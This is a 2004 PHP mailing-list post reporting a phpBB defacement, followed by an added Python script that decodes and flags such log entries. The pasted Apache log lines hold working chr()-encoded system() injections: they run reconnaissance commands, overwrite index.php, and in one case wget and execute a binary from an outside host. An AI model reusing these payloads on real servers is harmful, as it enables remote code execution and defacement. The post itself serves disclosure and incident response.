PHP Exploit via phpBB?

I haven't fully researched it yet, but our domains were just hacked, and from the looks of it, the attack came in thru phpBB. This morning, around 9:00am, I upgraded our webserver to php v4.3.10 from v4.3.9 due to potential security risks, and at 11:30 it looks as if the attack started. By 11:48, all of the php pages on all of our domains were replaced by one like this...

http://john.nichel.net

I don't know if this is a PHP problem or a phpBB problem as of yet, but I wanted to get the word out here so that y'all can take precautions if necessary. I disabled the system() function on our box, and may need to take further action as I discover more.

Below is what I believe to be the 'offensive' access from the Apache logs on the domain where the attack started. If you see something that I'm missing, please let the list know.

201.9.192.212 - - [22/Dec/2004:11:30:43 -0500] GET /temp_forums/viewtopic.php?t=111&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.1 200 101693 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:34:41 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 91134 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:34:59 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(112)%252echr(114)%252echr(111)%252echr(99)%252echr(47)%252echr(99)%252echr(112)%252echr(117)%252echr(105)%252echr(110)%252echr(102)%252echr(111)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 110263 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:35:43 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(108)%252echr(111)%252echr(99)%252echr(97)%252echr(108)%252echr(47)%252echr(97)%252echr(112)%252echr(97)%252echr(99)%252echr(104)%252echr(101)%252echr(47)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(47)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(100)%252echr(46)%252echr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 80061 -Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:35:50 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(108)%252echr(111)%252echr(99)%252echr(97)%252echr(108)%252echr(47)%252echr(97)%252echr(112)%252echr(97)%252echr(99)%252echr(104)%252echr(101)%252echr(47)%252echr(59)%252echr(108)%252echr(115)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 103205 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:36:06 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(104)%252echr(104)%252echr(32)%252echr(62)%252echr(32)%252echr(104)%252echr(97)%252echr(99)%252echr(46)%252echr(104)%252echr(114)%252echr(109)%252echr(108)%252echr(59)%252echr(108)%252echr(115)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 103578 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:36:34 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(72)%252echr(52)%252echr(99)%252echr(107)%252echr(51)%252echr(114)%252echr(83)%252echr(66)%252echr(82)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(32)%252echr(121)%252echr(111)%252echr(117)%252echr(114)%252echr(32)%252echr(98)%252echr(121)%252echr(32)%252echr(120)%252echr(100)%252echr(114)%252echr(48)%252echr(112)%252echr(52)%252echr(53)%252echr(53)%252echr(32)%252echr(62)%252echr(32)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252echr(112)%252echr(104)%252echr(112)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 80966 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:36:36 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 80793 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:36:41 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 80793 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:37:03 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 80793 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:37:25 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(109)%252echr(118)%252echr(32)%252echr(45)%252echr(102)%252echr(32)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252echr(112)%252echr(104)%252echr(112)%252echr(32)%252echr(47)%252echr(119)%252echr(101)%252echr(98)%252echr(115)%252echr(101)%252echr(114)%252echr(118)%252echr(101)%252echr(114)%252echr(47)%252echr(118)%252echr(104)%252echr(111)%252echr(115)%252echr(116)%252echr(115)%252echr(47)%252echr(98)%252echr(121)%252echr(45)%252echr(116)%252echr(111)%252echr(114)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(111)%252echr(99)%252echr(115)%252echr(47)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252echr(112)%252echr(104)%252echr(112)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 81926 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:41:53 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(105)%252echr(110)%252echr(116)%252echr(114)%252echr(97)%252echr(110)%252echr(111)%252echr(114)%252echr(116)%252echr(104)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(46)%252echr(98)%252echr(114)%252echr(47)%252echr(120)%252echr(112)%252echr(108)%252echr(47)%252echr(114)%252echr(48)%252echr(110)%252echr(105)%252echr(110)%252echr(59)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(55)%252echr(55)%252echr(55)%252echr(32)%252echr(114)%252echr(48)%252echr(110)%252echr(105)%252echr(110)%252echr(59)%252echr(46)%252echr(47)%252echr(114)%252echr(48)%252echr(110)%252echr(105)%252echr(110)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 83277 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:11:44:29 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1 200 80793 - Mozilla/3.0 (compatible; Indy Library)
201.9.192.212 - - [22/Dec/2004:12:09:49 -0500] GET /temp_forums//viewtopic.php?t=111&highlight=%2527%252e HTTP/1.1 200 101230 - Mozilla/3.0 (compatible; Indy Library)


--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
john@xxxxxxxxxxxx

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
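The log lines above share one shape: a double-URL-encoded PHP fragment in the phpBB `highlight` parameter (`%2527` decodes to `%27` and then to `'`, `%252e` to `%2e` and then to `.`) wrapping a `system()` call whose argument is spelled out as a chain of `chr()` calls so that no shell metacharacters appear in the raw request. The script below is an added triage helper, not code from the post or from phpBB: it parses Apache access-log lines, decodes the parameter twice, flags anything that looks like a PHP function call, and renders the `chr()` chain back into readable text so an incident responder can see what was attempted without decoding by hand. The sample log lines, client addresses and `chr()` chains are constructed for the example (documentation-range IPs, shortened payloads) and are not copied from a real log.

```python
"""Flag phpBB 'highlight' parameter code injection in Apache access logs.

Added example for triage. It decodes the doubly URL-encoded parameter,
detects PHP call syntax inside it, and expands chr() chains for display.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Combined Log Format, modelled on the entries in
# the post. Addresses are documentation-range placeholders; the chr() chains
# are shortened. The third line is a benign search for comparison.
SAMPLE_LOG = """\
198.51.100.7 - - [22/Dec/2004:11:30:43 -0500] "GET /forums/viewtopic.php?t=111&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.1" 200 101693 "-" "Mozilla/3.0 (compatible; Indy Library)"
198.51.100.7 - - [22/Dec/2004:11:36:36 -0500] "GET /forums//viewtopic.php?t=111&highlight=%2527%252esystem(chr(112)%252echr(119)%252echr(100))%252e%2527 HTTP/1.1" 200 80793 "-" "Mozilla/3.0 (compatible; Indy Library)"
203.0.113.9 - - [22/Dec/2004:12:01:02 -0500] "GET /forums/viewtopic.php?t=42&highlight=security HTTP/1.1" 200 54321 "-" "Mozilla/5.0"
"""

# Accepts the quoted request field of the Combined Log Format as well as the
# unquoted form shown in the post (quotes are optional in the pattern).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "?(?P<method>[A-Z]+) '
    r'(?P<target>\S+) HTTP/[\d.]+"? (?P<status>\d{3})'
)
# PHP functions that never belong in a forum search/highlight parameter.
CALL_RE = re.compile(r"\b(system|exec|passthru|shell_exec|popen|eval|chr)\s*\(", re.I)
# One chr(N) call plus the '.' concatenation operator that joins it to the next.
CHR_RE = re.compile(r"chr\s*\(\s*(\d+)\s*\)\s*\.?")


def query_params(target):
    """Split the request target's query string WITHOUT decoding the values,
    so the double encoding can be undone in one controlled place."""
    _, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(key, []).append(value)
    return params


def decode_highlight(raw):
    """Undo the double URL-encoding used to carry quotes and dots past the
    first decode performed by the web server / PHP."""
    return unquote(unquote(raw))


def render_chr(fragment):
    """Replace each chr(N) (and its joining '.') with the character it
    produces; non-printable bytes are shown as \\xNN escapes."""
    def one(m):
        n = int(m.group(1))
        ch = chr(n)
        return ch if ch.isprintable() else f"\\x{n:02x}"
    return CHR_RE.sub(one, fragment)


def is_injection(decoded):
    """True when the decoded parameter contains PHP call syntax."""
    return CALL_RE.search(decoded) is not None


def scan(log_text):
    """Return one record per request whose highlight parameter carries PHP code.
    Status and size are kept: a 200 with a full-size page means the script
    ran to completion, which is the case to escalate first."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for raw in query_params(m.group("target")).get("highlight", []):
            decoded = decode_highlight(raw)
            if is_injection(decoded):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "status": m.group("status"),
                    "decoded": render_chr(decoded),
                })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['status']} {hit['decoded']}")
```

Run against a real access log with `scan(open("access_log").read())`; the `decoded` field is what the responder reads, while the `ip` and `time` fields feed the timeline. The rendering step deliberately only expands `chr()` and never executes anything from the log.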

